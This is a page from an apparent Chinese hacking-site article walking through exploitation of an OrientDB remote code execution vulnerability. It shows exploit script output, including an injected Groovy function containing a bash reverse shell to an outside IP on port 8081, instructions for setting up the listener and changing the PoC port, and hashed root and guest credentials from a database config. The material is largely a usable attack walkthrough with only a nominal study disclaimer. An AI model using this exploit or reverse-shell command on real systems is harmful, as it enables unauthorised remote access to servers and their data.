欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

OrientDB远程代码执行漏洞利用与分析

来源:本站整理 作者:佚名 时间:2017-08-26 TAG: 我要投稿
[+] Enabled functional operations on database.function
[+] Enabling access to system clusters
8bd94
Enter the ip to connect back: 59.*. *.*** //输入反弹的IP地址,注意前后无空格
[+] Exploitation successful, get ready for your shell.Executing 8bd94
[+] Exploitation failed at last step, try running the script again.
400
{
"errors": [
{
"code": 400,
"reason": "Bad request",
"content": "Error on evaluation of the script library. Error: org.codehaus
.groovy.control.MultipleCompilationErrorsException: startup failed:\u000aScript1
.groovy: 1: unexpected token: def @ line 1, column 1.\u000a def 8bd94() {\u000
a ^\u000a\u000a1 error\u000a\u000aScript library was:\u000adef 8bd94() {\u000a
def command = 'bash -i >& /dev/tcp/59.110.62.194/8081 0>&1';File file = new File
(\"hello.sh\");file.delete();file 
}
]
}
[+] Cleaning Up..database.class.ouser
[+] Cleaning Up..database.function
[+] Cleaning Up..database.systemclusters
(2)设置反弹的IP
如果检测到目标对象存在漏洞,则提示输入一个反弹的IP地址,该IP地址事先需要进行8081端口监听,如果命令执行成功则获取反弹的shell,执行效果如图3和图4所示。


注意:
(1)由于命令是针对linux,因此反弹IP前不能有空格,否则执行不成功。
(2)反弹端口可以更改poc中的8081
(3)OrientDB数据库密码是加密的。例如获取某数据库配置文件中的数据库用户和密码:
user resources="*" password="{PBKDF2WithHmacSHA256}3D2969BF5BF1E819C6358CEF534327A32D205928D77B6D47:56B6EE75711C3600BCB23011685F253EE3F645E1BFA70AB8:65536" name="root"/>
user resources="connect,server.listDatabases,server.dblist" password="{PBKDF2WithHmacSHA256}AD0DA873F5BEB2343257A07B51326BBAECF8A894F960328E:B183077FF32DD1F40F3031EF048F5D8169E7EB6FB3C09004:65536" name="guest"/>
 

上一页  [1] [2] [3] [4] 

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载